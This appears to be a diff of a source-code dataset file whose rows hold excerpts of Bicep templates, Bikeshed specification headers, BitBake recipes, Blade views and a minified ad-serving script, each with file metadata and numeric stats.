+//@[04:022) | | └─Token(Identifier) |deploymentLocation| +//@[23:024) | ├─Token(Assignment) |=| +//@[25:046) | └─PropertyAccessSyntax +//@[25:037) | ├─FunctionCallSyntax +//@[25:035) | | ├─IdentifierSyntax +//@[25:035) | | | └─Token(Identifier) |deployment| +//@[35:036) | | ├─Token(LeftParen) |(| +//@[36:037) | | └─Token(RightParen) |)| +//@[37:038) | ├─Token(Dot) |.| +//@[38:046) | └─IdentifierSyntax +//@[38:046) | └─Token(Identifier) |location| +//@[46:048) ├─Token(NewLine) |\n\n| + +var scopesWithArmRepresentation = { +//@[00:056) ├─VariableDecl","15","0.8333333333333334","0.0","0.0" +"01f8e38ee9d8850900b9f225b9de9642238b5f84","markdown001.bs",".bs","Bikeshed","

Foo

+ +
+Group: test
+Shortname: foo
+Level: 1
+Status: ED
+ED: http://example.com/foo
+Abstract: Test of markdown constructs
+Editor: Example Editor
+Date: 1970-01-01
+
-output idScope string = dps.properties.idScope -var key = listKeys(resourceId('Microsoft.Devices/provisioningServices/keys', dps.name, 'provisioningserviceowner'), dps.apiVersion).primaryKey -output connectionString string = 'HostName=${dps.properties.serviceOperationsHostName};SharedAccessKeyName=provisioningserviceowner;SharedAccessKey=${key}' -output name string = name -","15","2.142857142857143","0.0","0.0" -"004d03ba447b13437dedce8c2b78750de29c1ccf","main.bicep",".bicep","Bicep","@description('Name of the CDN Profile') -param profileName string +Double-Underline Heading +======================== {#a} -@description('Name of the CDN Endpoint, must be unique') -param endpointName string +text -@description('Url of the origin') -param originUrl string +Single-Underline Heading +------------------------ {#b} -@description('CDN SKU names') -@allowed([ - 'Standard_Akamai' - 'Standard_Microsoft' - 'Standard_Verizon' - 'Premium_Verizon' -]) -param CDNSku string = 'Standard_Microsoft' +text -@description('Location for all resources.') -param location string = resourceGroup().location +# One-Hash Heading # {#c} -resource profile 'Microsoft.Cdn/profiles@2020-04-15' = { - name: profileName - location: location - sku: { - name: CDNSku - } -} +text -resource endpoint 'Microsoft.Cdn/profiles/endpoints@2020-04-15' = { - parent: profile - name: endpointName - location: location - properties: { - originHostHeader: originUrl - isHttpAllowed: true - isHttpsAllowed: true - queryStringCachingBehavior: 'IgnoreQueryString' - contentTypesToCompress: [ - 'application/eot' - 'application/font' - 'application/font-sfnt' - 'ap","15","2.142857142857143","0.0","0.0" -"21506b336f46c9b888475e754ecd8c43a21223ab","main.sourcemap.bicep",".bicep","Bicep","targetScope = 'subscription' - -resource rg 'Microsoft.Resources/resourceGroups@2020-06-01' = { -//@[33:38] ""type"": ""Microsoft.Resources/resourceGroups"", - name: 'adotfrank-rg' - location: deployment().location -//@[37:37] ""location"": ""[deployment().location]"" -} - -module appPlanDeploy 'br:mock-registry-one.invalid/demo/plan:v2' = { -//@[39:99] ""type"": ""Microsoft.Resources/deployments"", - name: 'planDeploy' -//@[42:42] ""name"": ""planDeploy"", - scope: rg - params: { - namePrefix: 'hello' -//@[51:51] ""value"": ""hello"" - } -} +## Two-Hash Heading ## {#d} -module appPlanDeploy2 'br/mock-registry-one:demo/plan:v2' = { -//@[100:160] ""type"": ""Microsoft.Resources/deployments"", - name: 'planDeploy2' -//@[103:103] ""name"": ""planDeploy2"", - scope: rg - params: { - namePrefix: 'hello' -//@[112:112] ""value"": ""hello"" - } -} +text -var websites = [ -//@[11:20] ""websites"": [ - { - name: 'fancy' -//@[13:13] ""name"": ""fancy"", - tag: 'latest' -//@[14:14] ""tag"": ""latest"" - ","15","2.142857142857143","0.0","0.0" -"00b70c1bedf42f588878fcf9e52992b34f4d92d2","examples-appservice.bicep",".bicep","Bicep","// Copyright (c) Microsoft Corporation. -// Licensed under the MIT License. +### Three-Hash Heading ### {#e} -// Bicep documentation examples +text -@description('The name of the Web App.') -param name string +#### Four-Hash Heading #### {#f} -@description('The name of the App Services Plan.') -param planName string +text -@description('Tags to apply to the resource.') -param tags object +##### Five-Hash Heading ##### {#g} -@description('The location resources will be deployed.') -param location string = resourceGroup().location +text -// An example App Services Plan -resource plan 'Microsoft.Web/serverfarms@2022-03-01' = { - name: planName - location: location - sku: { - name: 'S1' - tier: 'Standard' - capacity: 2 - } -} +###### Six-Hash Not-A-Heading ###### {#h} -// An example .NET Framework Web App -resource webApp 'Microsoft.Web/sites@2022-03-01' = { - name: name - location: location - identity: { - type: 'SystemAssigned' - } - kind: 'web' - properties: { - serverFarmId: plan.id - httpsOnly: true - siteConfig: { - alwaysOn: true - minTlsVersion: '1.2' - ftpsState: 'FtpsOnly' - remoteDebuggingEnabled: false - http20En","15","2.142857142857143","0.0","0.0" -"02c002be255a97ab4d94433908a6fc97706328c1","index.bs",".bs","Bikeshed","
-Title: Intersection Observer
-Status: ED
-ED: https://w3c.github.io/IntersectionObserver/
-Shortname: intersection-observer
-TR: https://www.w3.org/TR/intersection-observer/
-Previous version: https://www.w3.org/TR/2019/WD-intersection-observer-20190530/
-Level: none
-Editor: Stefan Zager, Google, szager@google.com, w3cid 91208
-Editor: Emilio Cobos Álvarez , Mozilla, emilio@mozilla.com, w3cid 106537
-Former Editor: Michael Blain, Google, mpb@google.com, w3cid 73819
-Abstract: This specification describes  an API that can be used to understand the visibility and position of DOM elements (""targets"") relative to a containing element or to the top-level viewport (""root""). The position is delivered asynchronously and is useful for understanding the visibility of elements and implementing pre-loading and deferred loading of DOM content.
-Group: webapps
-Repository: W3C/IntersectionObserver
-Test Suite: http://w3c-test.org/intersection-observer/
-Ignored Vars: rootMargin, docs
-
-Title: Should the output of std::print to a terminal be synchronized with the underlying stream?
-Shortname: P2539
-Revision: 4
-Audience: LWG
-Status: P
-Group: WG21
-URL:
-Editor: Victor Zverovich, victor.zverovich@gmail.com
-No abstract: true
-Date: 2022-11-08
-Markup Shorthands: markdown yes
-
+Tight Bulleted List +=================== - +* one +* two +* three -Introduction {#intro} +Loose Bulleted List +=================== + +* one + +* two + +* three + +List With Paragraphs +==================== + +* one + one + one + + another paragraph + one + one + +* two + +Nested Lists ============ -To prevent mojibake `std::print` may use a native Unicode API when writing to -a terminal bypassing the stream buffer. During the review of [[P2093]] -""Formatted output"" Tim Song suggested that synchronizing `std::print` with the -underlying stream may be beneficial for gradual adoption. This paper presents -motivating examples, observes that this problem doesn't normally happen in -pr","42","0.875","0.0","0.0" -"02b0edc6a328ebf074b244f40c2cefcb11b38820","Overview.bs",".bs","Bikeshed","
-Title: CSS Shapes Module Level 1
-Status: ED
-Work Status: Testing
-Shortname: css-shapes
+* one
+
+	* nested one
+	* nested two
+*
+	* nested one
+	* nested two
+* * nested one
+	* nested two
+
+Numbered List
+=============
+
+1. one
+2. two
+1. three
+
+Mixed Lists
+===========
+
+1. numbered one
+
+	* bullet","52","1.1304347826086956","0.0","0.0"
+"06c0412e1d8413ffa574b9d33032467b6a638735","Misc.bs",".bs","Bikeshed","package Misc(sysMisc) where
+import RegFile
+import FIFO
+import ActionSeq
+
+type Int32 = UInt 32
+
+sysMisc :: Module Empty
+sysMisc =
+     module
+	m :: Thingy
+	m <- mkThingy
+	x :: Reg Int32
+	x <- mkRegU
+	done :: Reg Bool
+	done <- mkReg False
+	s :: ActionSeq
+	s <- actionSeq ( m.fill |> m.square |> m.sum |> action { x := m.total; done := True } )
+	unused :: Reg Bool
+	unused <- mkRegU
+        rules
+	    when not done
+	     ==> action { s.start }
+
+interface Thingy =
+	fill :: Action
+	square :: Action
+	sum :: Action
+	total :: Int32
+
+type Size = 5
+type Indx = UInt Size
+
+data State = Idle | Fill | Square | Sum
+	deriving (Bits, Eq)
+
+-- XXX
+ext :: Indx -> Int32
+ext x = unpack (0 ++ pack x)
+
+mkThingy :: Module Thingy
+mkThingy =
+    module
+	a1 :: RegFile Indx Int32
+	a1 <- mkRegFileFull
+	a2 :: RegFile Indx Int32
+	a2 <- mkRegFileFull
+	f1 :: FIFO Int32
+	f1 <- mkFIFO
+	f2 :: FIFO Int32
+	f2 <- mkFIFO
+	state :: Reg State
+	state <- mkReg Idle
+        i :: Reg Indx
+	i <- mkRegU
+        j :: Reg Indx
+	j <- mkReg","52","1.1304347826086956","0.0","0.0"
+"1208c1491458505aade982f6b997ac5b6695e78c","Overview.bs",".bs","Bikeshed","
+Title: CSS Scroll Anchoring Module Level 1
+Shortname: css-scroll-anchoring
 Level: 1
 Group: csswg
-TR: https://www.w3.org/TR/css-shapes/
-ED: https://drafts.csswg.org/css-shapes/
-Previous Version: http://www.w3.org/TR/2014/CR-css-shapes-1-20140320/
-Editor: Vincent Hardy, Adobe Systems, Inc., vhardy@adobe.com
-Editor: Rossen Atanassov, Microsoft Corporation, ratan@microsoft.com, w3cid 49885
-Editor: Alan Stearns, Adobe Systems, Inc., stearns@adobe.com, w3cid 46659
-!Issues list: In Bugzilla
-Abstract: CSS Shapes describe geometric shapes for use in CSS. For Level 1, CSS Shapes can be applied to floats. A circle shape on a float will cause inline content to wrap around the circle shape instead of the float's bounding box.
-Link Defaults: css2 (property) margin
+Status: ED
+Work Status: Revising
+ED: https://drafts.csswg.org/css-scroll-anchoring
+Editor: Steve Kobes, Google
+Editor: Tab Atkins-Bittner, Google, http://xanthir.com/contact/, w3cid 42199
+Abstract: Changes in DOM elements above the visible region of a scrolling box can result in the page moving
+Abstract: while the user is in the middle of consuming the content.
+Abstract:
+Abstract: This spec proposes a mechanism to mitigate this jarring user experience
+Abstract: by keeping track of the position of an anchor node and adjusting the scroll offset accordingly.
+Abstract:
+Abstract: This spec also proposes an API for web developers to opt-out of this behavior.
 

 
+
+spec:css-box; type:dfn; text:content area
+spec:css22;
+	type:property;
+		text:max-height
+		text:min-height
+		text:height
+		text:max-width
+		text:min-width
+		text:width
+	type:dfn; te","52","1.1304347826086956","0.0","0.0"
+"01f78ae66e6af8e34c153c922774d4f50399a0ed","Overview.bs",".bs","Bikeshed","
+Title: CSS Box Model Module Level 3
+Shortname: css-box
+Level: 3
+Status: ED
+Work Status: Refining
+Group: csswg
+ED: https://drafts.csswg.org/css-box-3/
+TR: https://www.w3.org/TR/css-box-3/
+Previous Version: https://www.w3.org/TR/2020/WD-css-box-3-20201028/
+Abstract: This specification describes the margin and padding properties, which create spacing in and around a CSS box.
+Editor: Elika J. Etemad / fantasai, Invited Expert, http://fantasai.inkedblade.net/contact, w3cid 35400
+Ignored Terms: internal table elements, block layout
+At risk: applicability of 'margin', 'padding' and their longhands to [=ruby base containers=] and [=ruby annotation containers=]
+Issue Tracking: CSSWG GitHub https://github.com/w3c/csswg-drafts/issues
+

 
-s","42","0.875","0.0","0.0"
-"0b7a64fa1cfd17bb106b51d214a4bcf249a8e87f","adServer.bs",".bs","Bikeshed","var ebPtcl=""http://"",ebBigS=""ds.serving-sys.com/BurstingCachedScripts/"",ebResourcePath=""ds.serving-sys.com/BurstingRes//"";ebRand=(""""+Math.random()).substr(2);var winP=window.location.protocol;if(""javascript:""==winP)try{winP=parent.location.protocol}catch(e){}1&&""https:""==winP&&(ebPtcl=""https://"",ebBigS=""secure-""+ebBigS,ebResourcePath=""secure-""+ebResourcePath);ebBigS=ebPtcl+ebBigS;ebResourcePath=ebPtcl+ebResourcePath;var dmg=""undefined""!=typeof gEBMainWindow&&void 0!==gEBMainWindow.EBP&&void 0!==gEBMainWindow.EBP.downloadMgr?gEBMainWindow.EBP.downloadMgr:!1;var placementId=12603279,asc=dmg&&void 0!==dmg.ebSync&&void 0!==dmg.ebSync.async&&void 0!==dmg.ebSync.placementIdObj[placementId]&&dmg.ebSync.placementIdObj[placementId].async;gEbUT="""";gEbUT=""tp_PlacementID%3D12603279%24%24tp_AdID%3D26685459%24%24"";function ebTX(e){try{for(var t={},r=unescape(gEbUT).split(""$$""),n=0;n
 
-SRC_URI = ""${SOURCEFORGE_MIRROR}/wqy/wqy-zenhei-${PV}.tar.gz""
-SRC_URI[md5sum] = ""4c6c3f4e902dd5ee0a121e8c41d040bd""
-SRC_URI[sha256sum] = ""e4b7e306475bf9427d1757578f0e4528930c84c44eaa3f167d4c42f110ee75d6""
+Introduction {#intro}
+============
 
-S = ""${WORKDIR}/wqy-zenhei""
+	
This subsection is not normative.
 
-do_install_append () {
-    sed -i -e '/[^W]/d' ${S}/44-wqy-zenhei.conf
-    install -d ${D}${sysconfdir}/fonts/conf.d
+	
CSS describes how each element
+	and each string of text in a source docume","52","1.1304347826086956","0.0","0.0"
+"11729ed02b6e6851d703dccb4efbd58006e8b214","Overview.bs",".bs","Bikeshed","
CSS Containment Module Level 1

 
-    for x in ${S}/*.conf; do
-        install -m 0644 $x ${D}${sysconfdir}/fonts/conf.d/
-    done
-}
+
+Level: 1
+Shortname: css-contain
+Status: ED
+Work Status: Revising
+Group: csswg
+ED: https://drafts.csswg.org/css-contain/
+TR: https://www.w3.org/TR/css-contain-1/
+Previous Version: https://www.w3.org/TR/2017/WD-css-contain-1-20170419/
+Previous Version: https://www.w3.org/TR/2017/WD-css-contain-1-20170221/
+Editor: Tab Atkins, Google, http://xanthir.com/contact/
+Editor: Florian Rivoal, On behalf of Bloomberg, https://florian.rivoal.net/, w3cid 43241
+Abstract: This CSS module describes the 'contain' property, which indicates that the element's subtree is independent of the rest of the page. This enables heavy optimizations by user agents when used well.
+Ignored Terms: scrollWidth, scrollHeight, clientWidth, clientHeight, formatting context
+Link Defaults: css-lists-3 (property) counter-increment, css-content-3 (property) string-set
+

 
-PACKAGES = ""${PN}""
-FONT_PACKAGES = ""${PN}""
+

+Introduction

 
-FILES_${PN} = ""${datadir}/fonts ${sysconfdir}""
-","775","0.9439707673568819","0.0","0.0"
-"028fc5071705365015da67851d4b53a9d0d93866","loudmouth_1.4.3.bb",".bb","BitBake","DESCRIPTION = ""Loudmouth is a lightweight and easy-to-use C library for programming with the Jabber protocol.""
-HOMEPAGE = ""http://www.loudmouth-project.org/""
+	Efficiently rendering a website relies on the User Agent","52","1.1304347826086956","0.0","0.0"
+"0c1840c9a09e41b97e852eb40aeab362aa5b0121","xfce4-datetime-setter_3.32.2.bb",".bb","BitBake","DESCRIPTION = ""A fork of (early) gnome-control-center datetime panel for XFCE. \
+It is based upon GTK3 and embedds into recent xfce4-settings.""
+HOMEPAGE = ""https://github.com/schnitzeltony/xfce4-datetime-setter""
+LICENSE = ""GPLv2""
+LIC_FILES_CHKSUM = ""file://COPYING;md5=75859989545e37968a99b631ef42722e""
 
-LICENSE = ""LGPL-2.1-only""
-LIC_FILES_CHKSUM = ""file://COPYING;md5=c4f38aef94828f6b280e00d1173be689""
+DEPENDS = ""glib-2.0-native libxfce4ui""
 
-DEPENDS = ""glib-2.0 libcheck openssl libidn""
+SRC_URI = ""git://github.com/schnitzeltony/xfce4-datetime-setter.git;protocol=https \
+           file://fix-inner-dependency.patch \
+""
+SRCREV = ""5c7a73a3824b03b91719e05e2604b97c7a72d50f""
 
-inherit gnomebase gtk-doc
+S = ""${WORKDIR}/git""
 
-PR = ""r2""
+inherit gettext meson features_check
 
-SRC_URI += ""file://04-use-pkg-config-for-gnutls.patch \
-            file://glib-2.32.patch""
+REQUIRED_DISTRO_FEATURES = ""systemd x11""
 
-SRC_URI[archive.md5sum] = ""55339ca42494690c3942ee1465a96937""
-SRC_URI[archive.sha256sum] = ""95a93f5d009b71ea8193d994aa11f311bc330a3efe1b7cd74dc48f11c7f929e3""
-GNOME_COMPRESS_TYPE=""bz2""
+FILES_${PN} += ""${datadir}/icons/hicolor""
 
-EXTRA_OECONF = ""--with-ssl=openssl""
+RDEPENDS_${PN} = ""tzdata""
+","791","1.0761904761904761","0.0","0.0"
+"01806dc12a91361dda3175d8875746bf0505c63a","ghc-contravariant_0.2.0.2.bb",".bb","BitBake","BBCLASSEXTEND = ""native""
 
-","775","0.9439707673568819","0.0","0.0"
-"21165709ef5f027a5e9bcf47745bfe902c049ce8","ntfs-3g_2009.4.4.bb",".bb","BitBake","DESCRIPTION = ""The NTFS-3G driver is an open source, freely available NTFS driver for Linux with read and write support.""
-HOMEPAGE = ""http://www.ntfs-3g.org/""
-LICENSE = ""GPLv2""
-DEPENDS = ""fuse""
-RDEPENDS = ""fuse""
+SRC_URI[md5sum] = ""3b73dd486bc7c62752924d9217762f74""
+SRC_URI[sha256sum] = ""77b8e9fcc65df51714eb95615b23371aa3bd864e8c6dedb775eb939058d08204""
 
-SRC_URI = http://www.ntfs-3g.org/ntfs-3g-${PV}.tgz
+inherit ghc ghc-lib-common
 
-inherit autotools
+DEPENDS += ""ghc-transformers""
+DESCRIPTION = ""Haskell 98 contravariant functors""
+LICENSE = ""BSD-3-Clause""
+LIC_FILES_CHKSUM=""file://LICENSE;md5=daf6c5b2c1afd111ff98da4be98babc6""
+GHC_PN = ""contravariant""
+","791","1.0761904761904761","0.0","0.0"
+"032418b88a59a0d3a0121d003631fc43890daf1b","vyos-cfg-qos_git.bb",".bb","BitBake","SUMMARY = ""VyOS Configuration templates and scripts for QoS""
+HOMEPAGE = ""https://github.com/vyos/vyatta-cfg-qos""
+SECTION = ""vyos/qos""
 
-EXTRA_OEMAKE = ""LDCONFIG=echo""
 
-SRC_URI[md5sum] = ""e0b5c170f088a8d82968f0a6b34d31da""
-SRC_URI[sha256sum] = ""bcd39ebe90541f512e605b62911f14f6107239c4ff032d56d5da3dc3c05e0d0f""
-","775","0.9439707673568819","0.0","0.0"
-"00963e030736acfb2bd47ba6f605aea6acec22c9","openvpn_2.1.3.bb",".bb","BitBake","SUMMARY = ""A full-featured SSL VPN solution via tun device.""
-HOMEPAGE = ""http://openvpn.sourceforge.net""
-SECTION = ""console/network""
 LICENSE = ""GPLv2""
-LIC_FILES_CHKSUM = ""file://COPYING;md5=5aac200199fde47501876cba7263cb0c""
-DEPENDS = ""lzo openssl""
+LIC_FILES_CHKSUM = ""file://COPYING;md5=eb723b61539feef013de476e68b5c50a""
 
-inherit autotools
+SRC_URI = ""git://github.com/vyos/vyatta-cfg-qos.git;branch=current;protocol=https \
+	  ""
 
-SRC_URI = ""http://openvpn.net/release/openvpn-${PV}.tar.gz ""
-#           file://openvpn""
+# snapshot from Aug 11, 2017:
+SRCREV = ""52f85ec00b8e85723920ebaab49ed8b318d9d475""
 
-SRC_URI[md5sum] = ""7486d3e270ba4b033e311d3e022a0ad7""
-SRC_URI[sha256sum] = ""5185181df2e6043bd667377bc92e36ea5a5bd7600af209654f109b6403ca5b36""
+PV = ""1.0+git${SRCPV}""
 
-CFLAGS += ""-fno-inline""
+S = ""${WORKDIR}/git""
 
-# I want openvpn to be able to read password from file (hrw)
-EXTRA_OECONF += ""--enable-password-save""
+DEPENDS = ""vyos-bash""
+RDEPENDS_${PN} = ""sed perl procps vyos-cfg vyos-bash iproute2 bridge-utils ethtool""
 
-do_configure_append() {
-    #On my system the openvpn configure is deteting the path of the host ifconfig, not the target..  Manually fix it
-    sed -i 's:/bin/ifconfig:/sbin/ifconfig:g' ./config.h
-    sed -i 's:/bin/route:/sbin/route:g' ./config.h
+FILES_${PN} += ""/opt""
 
-}
 
-do_install_append() {
-    install -d ${D}/${sysconfdir}/init.d
-    install -d ${D}/${sysconfdir}/openvpn
-#    install -","775","0.9439707673568819","0.0","0.0"
-"05074ce1da2187e70061922310107dd96b1f9397","tag.blade.php",".php","Blade","@extends('store.store')
+# NOTE: this software seems not capable of being built in a separate build directory
+# from the source, therefore using 'autotools-brokensep' instead of 'autotools'
+inherit autotools-brokensep
 
-@section('categories')
-    @include('store.partial.categories')
-@stop
+# additional options to be passed to the configure script:
+EXTRA_OECONF = ""\
+    --prefix=/opt/vyatta \
+    --exec_prefix=/opt/vyatta \
+	--sbindir=/opt/vyatta/sbin \
+	--bindir=/opt/vyatta/bin \
+	--datadir=/opt/vyatta/share \
+	--","791","1.0761904761904761","0.0","0.0"
+"11a0f93f7795dcf28367ba7a5d723d59bfb819cc","mmc-utils_git.bb",".bb","BitBake","SUMMARY = ""Userspace tools for MMC/SD devices""
+HOMEPAGE = ""http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/""
+LICENSE = ""GPLv2""
+LIC_FILES_CHKSUM = ""file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d""
 
-@section('content')
-    

-        

-            
Tag: {{ $tagName }}

+SRCBRANCH ?= ""master""
+SRCREV = ""2cb6695e8dec00d887bdd5309d1b57d836fcd214""
 
-            @include('store.partial.product', ['products'=>$products])
+PV = ""0.1""
 
-        

-    

-@stop","23730","1.0056363097003855","0.0","0.0"
-"1477039bc3be035c37e25a7bd41e5c9d9ac2a3ae","admin_content_management.blade.php",".php","Blade","@extends('cmsgroovel.layouts.groovel_admin_content')
-@section('content')
-

-				
-